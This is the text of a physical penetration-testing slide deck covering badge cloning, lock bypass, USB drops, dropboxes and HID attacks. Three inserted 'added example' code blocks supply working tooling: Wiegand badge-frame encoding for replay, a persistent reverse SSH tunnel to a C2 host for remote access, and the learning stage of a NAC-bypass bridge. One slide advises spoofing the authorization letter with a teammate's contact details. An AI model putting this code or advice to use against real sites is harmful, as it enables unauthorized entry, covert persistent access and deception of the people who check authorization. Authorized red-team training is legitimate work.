How to Build Your Own Physical Pentesting Go-bag


Page 1: How to Build Your Own Physical Pentesting Go-bag

Build Your Own Physical Pentesting Go-Bag

Beau Bullock - @dafthack
Derek Banks - @0xderuke

Page 2

Overview
• Attackers commonly try attacking organizations remotely first
  • Phishing attacks
  • Exploiting vulnerabilities in externally facing systems
  • External credential dumps
  • Etc.
• If these fail, physical attacks are required

Page 3

Overview
• Having the right tools in the physical attack toolkit can determine success or failure
• Simply “getting in” is not enough
• What happens after one is inside an organization can make or break an operation
• We wanted to share what our physical pentesting go-bags look like

Page 4

About Us
• Pentesters at Black Hills Information Security
• Have a number of SANS and OffSec certs…
• CitySec Meetup Organizers
  • CigarCitySec – (Tampa, FL)
  • CitrusSec – (Orlando, FL)
  • TidewaterSec – (Poquoson, VA)
• Avid OWA enthusiasts

Page 5

Go-Bag
Where are we storing our gear?

Page 6

Choose a Quality Bag
• Totally a personal preference
• Weatherproofing
• GoRuck bags are top notch (but a bit expensive)
  • Built in USA
  • Scars Lifetime Guarantee
• Must comfortably hold all the gear

Page 7

“Remote” Physical Attacks
Sometimes, devices can make their way into organizations

Page 8

USB Drop
• Most employees are “very concerned” with things like budgets and payroll
• Dropping USBs with “sensitive data” in a parking lot gets shells
• Macro-enabled docs and spreadsheets are still king
• We are fans of PowerShell Empire payloads

Page 9

Backdoored Streaming Media Devices
• People enjoy gifts
• Streaming media devices require Internet
• Corporate WiFi networks seem to be a good place to plug in new gifts
• So, I backdoored an Amazon Fire Stick
• It calls back to a C2 server providing a remote shell

Page 10

Wireless Hacking
Can we attack the network over wireless frequencies?

Page 11

Wireless Gear
• Alfa cards (AWUS036H)
• Yagi antenna
• Ubertooth One
• WiFi Pineapple
• HackRF One
• Etc.

Page 12

Gaining Access
Physical Exploitation Methods

Page 13

Get-Out-of-Jail-Free Card
• Probably the most important thing.
• Needed to ensure your authorized pentest doesn’t land you in jail
• But, you can spoof these too
  • Change security contact info to someone on your team

Page 14

Social Engineering
• Simply walking into buildings works sometimes
  • The printer really needs paper…
• Having a good ruse is key though
• Tailgating
• Just knocking
  • Seriously, this has worked for me.
• Much more in-depth topic than can be covered quickly

Page 15

Lock Picks
• Having a good set of lock picks is a must
• Some quality brands:
  • Sparrows
  • SouthOrd
  • TOOOL
• Practice, practice, practice
• Shims

Page 16

Bypassing Devices
• Compressed air
• Under the Door Tool
• Credit card trick
• Whiskey
• Etc.

Page 17

RFID Cloning
• Misplaced belief in the security of RFID access control
• Many types of RFID access devices and protocols
• Can be confusing getting started
• Field-usable cloning device examples:
  • BLEKey
  • ESPKey
  • Proxmark3
  • Bishop Fox Tastic RFID Thief

Page 18

RFID Access Control
• Consists of a reader that energizes a tag, which returns a signal
• Return signal contains encoded information over a protocol
• Common RFID frequencies
  • Low Frequency (LF) – 125 kHz
    • HID Prox, EM
  • High Frequency (HF) – 13.56 MHz
    • MIFARE, HID iCLASS
• Wiegand is the most common format on the wire between reader and door controller (that wire is what the taps below clip onto)
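The data a Wiegand tap such as BLEKey or ESPKey captures is a train of pulses on the reader's D0 and D1 lines, which the tap frames and replays. The following is an added example (not code from this deck or from any of the tap projects it lists) that frames a constructed pulse capture, decodes the standard 26-bit format (even parity, 8-bit facility code, 16-bit card number, odd parity), and re-encodes a facility code and card number for replay; it rejects a frame with a flipped bit instead of passing it to the controller. The sample facility code, card number, and pulse timings are constructed for the example.

```python
"""Wiegand 26-bit decode/encode plus framing of tapped D0/D1 pulses.

Added example (not from the BHIS deck or any of the tap projects it lists).
Standard 26-bit layout, MSB first:
  bit 0       even parity over bits 1..12
  bits 1-8    8-bit facility code
  bits 9-24   16-bit card number
  bit 25      odd parity over bits 13..24
"""

def _ones(bits):
    return sum(bits) % 2

def decode_wiegand26(bits):
    """Decode a 26-character '0'/'1' string into (facility_code, card_number).

    Raises ValueError on bad length or a failed parity check: a tap should flag
    a corrupted capture rather than replay garbage to the controller.
    """
    if len(bits) != 26 or set(bits) - {"0", "1"}:
        raise ValueError("expected 26 bits of 0/1, got %r" % (bits,))
    b = [int(c) for c in bits]
    if _ones(b[0:13]) != 0:          # leading parity bit + first 12 data bits must be even
        raise ValueError("even parity check failed on leading half")
    if _ones(b[13:26]) != 1:         # last 12 data bits + trailing parity bit must be odd
        raise ValueError("odd parity check failed on trailing half")
    return int(bits[1:9], 2), int(bits[9:25], 2)

def encode_wiegand26(facility, card):
    """Build the 26-bit frame for a facility code and card number (what a replay sends)."""
    if not 0 <= facility <= 0xFF or not 0 <= card <= 0xFFFF:
        raise ValueError("facility code must fit 8 bits and card number 16 bits")
    data = [int(c) for c in format(facility, "08b") + format(card, "016b")]
    even = _ones(data[:12])          # 1 iff the first 12 data bits have an odd count
    odd = 1 - _ones(data[12:])       # set so the trailing 13 bits total an odd count
    return "".join(str(x) for x in [even] + data + [odd])

def frames_from_pulses(pulses, gap_ms=20.0):
    """Group timestamped D0/D1 pulses, as a wire tap sees them, into bit strings.

    pulses: (time_ms, bit) pairs, bit 0 for a D0 pulse and 1 for a D1 pulse.
    Pulses within one card read are about 1-2 ms apart; a gap longer than
    gap_ms starts a new frame.
    """
    frames, current, last_t = [], [], None
    for t, bit in sorted(pulses):
        if last_t is not None and t - last_t > gap_ms:
            frames.append("".join(str(x) for x in current))
            current = []
        current.append(bit)
        last_t = t
    if current:
        frames.append("".join(str(x) for x in current))
    return frames

def decode_capture(pulses):
    """Decode every frame in a pulse capture; None marks a frame that failed validation."""
    results = []
    for frame in frames_from_pulses(pulses):
        try:
            results.append(decode_wiegand26(frame))
        except ValueError:
            results.append(None)
    return results

# Constructed sample capture: one good read of facility 42 / card 12345, then the same
# read 500 ms later with one data bit flipped (a noisy tap), which parity must reject.
SAMPLE_FRAME = encode_wiegand26(42, 12345)      # "10010101000110000001110011"
CORRUPTED_FRAME = SAMPLE_FRAME[:5] + ("0" if SAMPLE_FRAME[5] == "1" else "1") + SAMPLE_FRAME[6:]
SAMPLE_PULSES = ([(i * 2.0, int(c)) for i, c in enumerate(SAMPLE_FRAME)]
                 + [(500.0 + i * 2.0, int(c)) for i, c in enumerate(CORRUPTED_FRAME)])

if __name__ == "__main__":
    for result in decode_capture(SAMPLE_PULSES):
        print("rejected" if result is None else "FC %d card %d" % result)
```

Parity is the only integrity check in a 26-bit Wiegand frame, so a replay tool that skips it will happily send a corrupted capture; checking it also tells you quickly whether a site uses a different bit length or a vendor format, which is where the Proxmark3's format database becomes useful.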

Page 19

BLEKey
• Physical tap for the Wiegand protocol
• Presented at Black Hat 2015
• Uses Bluetooth Low Energy to communicate
• Sniffed data can be offloaded to an app
• App can replay the signal, granting access

https://github.com/linklayer/BLEKey

Page 20

ESPKey
• Physical tap that communicates over WiFi
• Presented at ShmooCon 2017
  • Implantable Logic Analyzers and Unlocking Doors – Kenny McElroy
• Stands up a WiFi hotspot and has a web interface
• Draws power from the card reader
• Not quite for sale yet…

https://archive.org/details/ShmooCon2017

Page 21

Proxmark3 RDV2 Kit
• Portable RFID sniffing/reading/cloning
• Pretend to be a reader or a tag
• Both LF and HF antennas included
• Need to be relatively close to the badge
• Can be operated on battery or powered via USB
• Works with Kali NetHunter

Page 22

Bishop Fox Tastic RFID Thief
• Long-range RFID reader
• On your own to replay to the card reader
• Targets 125 kHz systems such as HID Prox and Indala Prox
• Code and parts list available for free online
• Uses an Arduino and a long-range card reader

https://www.bishopfox.com/resources/tools/rfid-hacking/attack-tools/

Page 23

Post Access Exploitation
You’re in. Now what?

Page 24

Pentest Dropbox
• Fully functional pentesting device
• Persistent reverse SSH tunnel
• Can be controlled over WiFi
• Relatively unnoticeable
• ODROID-C2 build instructions here: http://www.blackhillsinfosec.com/?p=5156
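The "persistent reverse SSH tunnel" is what turns a box left under a desk into a usable foothold, and the details that make it survive unattended are easy to get wrong. The following is an added example, not the scripts from the BHIS ODROID build linked above: it assembles the ssh invocation with the options that matter (no prompts, exit on a failed forward so the loop retries, keepalives to notice a dead link, a pinned C2 host key so the dropbox cannot be redirected to an impostor) and supervises it with capped exponential backoff. The C2 hostname, user, key and known_hosts paths are assumptions.

```python
"""Supervisor for a dropbox's persistent reverse SSH tunnel.

Added example; the BHIS ODROID build linked above uses its own scripts. Assumed:
the dropbox holds a dedicated key, the C2 host's key is pre-provisioned in
KNOWN_HOSTS so the box cannot be redirected to an impostor, and the operator
reaches the dropbox with `ssh -p 2222 root@127.0.0.1` on the C2 host.
"""
import subprocess
import time

INITIAL_DELAY = 5          # seconds before the first reconnect attempt
MAX_DELAY = 300            # cap so a long outage does not turn into hours of silence
KNOWN_HOSTS = "/root/.ssh/c2_known_hosts"   # assumed path, holds the pinned C2 host key only

def build_tunnel_command(c2_host, c2_user, remote_port, local_port=22,
                         key_path="/root/.ssh/dropbox_key"):
    """Assemble the ssh invocation. The options are what make the tunnel survive unattended:
    BatchMode never prompts; ExitOnForwardFailure makes ssh exit (so we retry) when the
    remote port is still held by a stale session; ServerAlive* detects a dead link instead
    of hanging on a half-open TCP connection; the pinned known_hosts file refuses any other
    host key."""
    return [
        "ssh", "-N", "-T",
        "-i", key_path,
        "-o", "BatchMode=yes",
        "-o", "ExitOnForwardFailure=yes",
        "-o", "ServerAliveInterval=30",
        "-o", "ServerAliveCountMax=3",
        "-o", "StrictHostKeyChecking=yes",
        "-o", "UserKnownHostsFile=%s" % KNOWN_HOSTS,
        "-R", "127.0.0.1:%d:127.0.0.1:%d" % (remote_port, local_port),
        "%s@%s" % (c2_user, c2_host),
    ]

def next_delay(previous):
    """Double the wait after each quick failure, up to MAX_DELAY."""
    return min(MAX_DELAY, previous * 2)

def supervise(cmd, run=subprocess.call, sleep=time.sleep, clock=time.monotonic,
              max_restarts=None):
    """Re-run ssh whenever it exits. A session that stayed up at least 60 s counts as
    healthy and resets the backoff; rapid exits (DNS down, port in use, key rejected)
    back off. Returns the list of sleeps performed once max_restarts is reached."""
    delay, restarts, sleeps = INITIAL_DELAY, 0, []
    while True:
        started = clock()
        run(cmd)
        if max_restarts is not None and restarts >= max_restarts:
            return sleeps
        restarts += 1
        healthy = clock() - started >= 60
        sleeps.append(delay)
        sleep(delay)
        delay = INITIAL_DELAY if healthy else next_delay(delay)

if __name__ == "__main__":
    supervise(build_tunnel_command("c2.example.net", "drop", 2222))   # assumed host/user
```

Bind the remote port to the C2 host's loopback (as the `-R` argument does) rather than to all interfaces, so the dropbox's SSH service is reachable only from a shell on the C2 box and not from anyone who scans it; on the dropbox side, run this under whatever init system the board uses so it comes back after a power cycle.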

Page 25

NAC Bypass Device
• Layer 2 and Layer 3 NAT – helps avoid triggering port security rules on 802.1X-protected ports
• Insert “between” the wall and a valid (already authenticated) system
• Device spoofs both sides of the wire
• Passively learns MAC addresses
• Current build is a BeagleBone Black
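The bridge must stay silent until it knows whom to impersonate: the authenticated host's MAC and IP on one side, and the MAC the switch/gateway answers from on the other. The following is an added example (not the BeagleBone build's code) of that passive learning stage over raw Ethernet frames: it parses ARP and IPv4 headers from frames seen on each interface, records the victim and upstream identities, and reports when enough has been learned to start NATing. The interface labels, MAC and IP addresses, and frames are all constructed for the example.

```python
"""Passive MAC/IP learning for a transparent NAC-bypass bridge.

Added example, not code from the BHIS BeagleBone build. Frames are raw Ethernet
bytes read from the two bridge interfaces; 'victim' is the side facing the already
authenticated workstation (or phone/printer), 'switch' the side facing the wall port.
"""
import struct
from dataclasses import dataclass
from typing import Optional

ETH_IPV4, ETH_ARP = 0x0800, 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2

def _mac(raw):
    return ":".join("%02x" % x for x in raw)

def _ip(raw):
    return ".".join(str(x) for x in raw)

def parse_frame(frame):
    """Return the addressing we can learn from one frame, or None if it is too short."""
    if len(frame) < 14:
        return None
    dst, src, etype = struct.unpack("!6s6sH", frame[:14])
    info = {"dst_mac": _mac(dst), "src_mac": _mac(src), "etype": etype,
            "src_ip": None, "dst_ip": None, "arp_op": None}
    payload = frame[14:]
    if etype == ETH_ARP and len(payload) >= 28:
        _, _, _, _, op, _sha, spa, _tha, tpa = struct.unpack("!HHBBH6s4s6s4s", payload[:28])
        info.update(arp_op=op, src_ip=_ip(spa), dst_ip=_ip(tpa))
    elif etype == ETH_IPV4 and len(payload) >= 20:
        info.update(src_ip=_ip(payload[12:16]), dst_ip=_ip(payload[16:20]))
    return info

@dataclass
class Learned:
    victim_mac: Optional[str] = None
    victim_ip: Optional[str] = None
    upstream_mac: Optional[str] = None     # MAC the victim talks to (gateway/switch SVI)
    upstream_ip: Optional[str] = None

    def ready(self):
        """The bridge may start NATing only once it can impersonate the victim upstream
        and the upstream device toward the victim."""
        return bool(self.victim_mac and self.victim_ip and self.upstream_mac)

def learn(capture, state=None):
    """Update the learned identity from (side, raw_frame) pairs without transmitting anything."""
    state = state or Learned()
    for side, raw in capture:
        f = parse_frame(raw)
        if f is None:
            continue
        if side == "victim":
            state.victim_mac = f["src_mac"]
            if f["src_ip"] and f["src_ip"] != "0.0.0.0":      # ignore DHCP discover / ARP probe
                state.victim_ip = f["src_ip"]
        elif side == "switch" and f["dst_mac"] == state.victim_mac:
            state.upstream_mac = f["src_mac"]
            if f["arp_op"] == ARP_REPLY:
                state.upstream_ip = f["src_ip"]
    return state

# ---- constructed sample capture (no real network involved) ----
def _eth(dst, src, etype, payload):
    return struct.pack("!6s6sH", dst, src, etype) + payload

def _arp(op, sha, spa, tha, tpa):
    return struct.pack("!HHBBH6s4s6s4s", 1, ETH_IPV4, 6, 4, op, sha, spa, tha, tpa)

def _ipv4(src, dst):
    # minimal 20-byte IPv4 header: version/IHL, TOS, total length, id, flags/frag, TTL, proto (TCP), checksum
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20, 0, 0, 64, 6, 0, src, dst)

VICTIM_MAC, GW_MAC = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
VICTIM_IP, GW_IP = bytes([10, 0, 0, 23]), bytes([10, 0, 0, 1])
BCAST = b"\xff" * 6

SAMPLE_CAPTURE = [
    ("victim", _eth(BCAST, VICTIM_MAC, ETH_ARP, _arp(ARP_REQUEST, VICTIM_MAC, VICTIM_IP, b"\0" * 6, GW_IP))),
    ("switch", _eth(VICTIM_MAC, GW_MAC, ETH_ARP, _arp(ARP_REPLY, GW_MAC, GW_IP, VICTIM_MAC, VICTIM_IP))),
    ("victim", _eth(GW_MAC, VICTIM_MAC, ETH_IPV4, _ipv4(VICTIM_IP, bytes([93, 184, 216, 34])))),
]

if __name__ == "__main__":
    print(learn(SAMPLE_CAPTURE))
```

Everything the bridge later sends upstream carries the learned victim MAC and IP, which is why it avoids port security and 802.1X: the switch only ever sees the host it already authenticated. The learning phase itself transmits nothing, so an 802.1X port that drops unauthenticated frames never notices the device.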

Page 26

Kon-Boot
• Bypass authentication on many systems
• Boot to a Kon-Boot USB or CD
• After getting in you could:
  • Dump local hashes
  • Add a new admin user
  • Get a shell
• Doesn’t work on encrypted HDs (full-disk encryption)

Page 27

Wi-Fi Keylogger
• Insert between keyboard and PC
• Connects to an AP specified by us
• Retrieve keys over the LAN connection
• Can email a report every hour
• Keys are stored locally as well
• 4 GB of storage
• Hardly noticeable

Page 28

PoisonTap
• Emulates an Ethernet device over USB
• Intercepts all Internet traffic
• Is able to sniff HTTP cookies and sessions from the browser
• Can be used on a locked machine

Page 29

LAN Turtle
• “Generic housing” USB device that, out of the box, provides:
  • Remote access
  • Network intelligence
  • Man-in-the-middle monitoring
• Community module framework
• Credential grabbing from a locked computer
  • Thanks @mubix!

Page 30

HID Attack – Rubber Ducky
• USB Human Interface Device (HID) keyboard injection attack platform
• From Hak5’s HakShop
• Takes advantage of the inherent trust in connected keyboard devices
• Payloads are written as scripts, then encoded onto the SD card
• Pre-configured payloads available
• Works on most platforms

Page 31

Kali NetHunter
• Kali Linux on a mobile device
• Android ROM overlay
• Builds available for Nexus, OnePlus, as well as other devices
• Chroot environment with multiple options, from minimal to full Kali installs
• HID attacks (DuckHunter)
• MANA evil access point
• BadUSB attacks
• Cost – variable

Page 32

Kali NetHunter (Ducky HID Attack)

DEMO!

Page 33

Conclusion
• There’s a lot more to compromising an organization than just getting in the door… And there is usually more than one door.
• Preparing for different situations before going on-site is a must.
• Include tools in your go-bag to help you succeed in each scenario.
• One last tip:
  • Do recon on the target location prior to getting there. Use Google Maps to locate entrances; use WiGLE to determine possible WiFi SSIDs.

Page 34

Gear List
• GoRuck bag
• Get-Out-of-Jail-Free Card
• “Remote” physical attack tools
  • USBs for USB drop
  • Backdoored Amazon Fire Stick
• Wireless gear
  • Alfa cards (AWUS036H)
  • Yagi antenna
  • Ubertooth One
  • WiFi Pineapple
  • HackRF One
• Physical exploitation tools
  • Lock picks
  • Compressed air
  • Under the Door Tool
• Badge cloning devices
  • Proxmark3 RDV2
  • BLEKey
  • ESPKey
  • Bishop Fox Tastic RFID Thief
• Post-access exploitation
  • Pentest dropbox
  • NAC bypass device
  • Kon-Boot
  • Wi-Fi keylogger
  • PoisonTap
  • LAN Turtles
  • Rubber Duckies
  • Kali NetHunter
• Laptop
• Additional tools
  • Powered screwdriver
  • Flashlight
  • Cat-5 cables
  • Battery packs for mobile devices
  • USB On-The-Go cable
  • Throwing Star LAN Tap (or real throwing stars)

Page 35

Summary and Conclusions
• Black Hills Information Security
  • http://www.blackhillsinfosec.com/
  • @BHInfoSecurity
• Beau Bullock @dafthack
• Derek Banks @0xderuke
• Questions?